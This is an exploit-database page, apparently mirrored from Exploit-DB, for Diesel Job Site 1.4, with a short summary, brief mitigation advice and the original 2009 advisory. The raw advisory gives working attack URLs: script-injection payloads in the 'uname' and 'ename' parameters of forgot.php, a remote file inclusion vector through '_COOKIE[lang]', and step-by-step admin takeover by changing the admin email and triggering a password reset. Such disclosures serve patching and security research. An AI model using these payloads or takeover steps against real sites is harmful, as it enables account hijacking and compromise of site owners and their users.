header-logo
Suggest Exploit
vendor:
Diesel Job Site 1.4
by:
indoushka
8.8
CVSS
HIGH
XSS, RFI, Admin Bypass, Bypass Settings
79, 94, 287, 639
CWE
Product Name: Diesel Job Site 1.4
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:diesel_job_site:diesel_job_site_1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Diesel Job Site 1.4 Multiple Vulnerabilities

The Diesel Job Site 1.4 is vulnerable to XSS, RFI, Admin Bypass, and Bypass Settings. An attacker can exploit these vulnerabilities by sending a malicious payload to the vulnerable parameters in the URL. For example, in the XSS vulnerability, an attacker can send a malicious script in the 'uname' and 'ename' parameters of the URL. For the RFI vulnerability, an attacker can send a malicious payload in the '_COOKIE[lang]' parameter of the URL. For the Admin Bypass vulnerability, an attacker can edit the email for the admin and search for the admin name, then submit the malicious payload in the 'forgot.php' page. Finally, for the Bypass Settings vulnerability, an attacker can send a malicious payload in the 'editsettings.php' page.

Mitigation:

The user should ensure that all the parameters in the URL are sanitized and validated before processing. The user should also ensure that the admin credentials are secure and not easily guessable.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Diesel Job Site 1.4 Multiple Vulnerabilities                            |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |                
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Powered by Diesel Job Site 1.4                                          |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
                                                                    | 
======================      Exploit By indoushka       =================================

# XSS: 
| 
| 1- http://server/resume/jobseekers/forgot.php?uname=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&fu=Submit
| 2- http://server/resume/employers/forgot.php?ename=<img+src=http://127.0.0.1/1.gif+onload=alert(213771818860)>&fu=Submit

# RFI:

1- http://server/resume/index.php?_COOKIE[lang]=[EV!L]

# Admin Bypass: 
 
1- http://server/resume/siteadmin/editsettings.php (1- edit the e-mail 4 admin and Searshing 4 admin name)
2- http://server/resume/siteadmin/forgot.php (2- put the name of admin and your email and submit)
3- go to your E-mail inbox you find the pass (Åä ÔÇÁ Çááå) 
4- login to admin Aera http://127.0.0.1/resume/siteadmin/

# Bypass Settings: 
 
1- http://server/resume/siteadmin/editsettings.php

|  
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------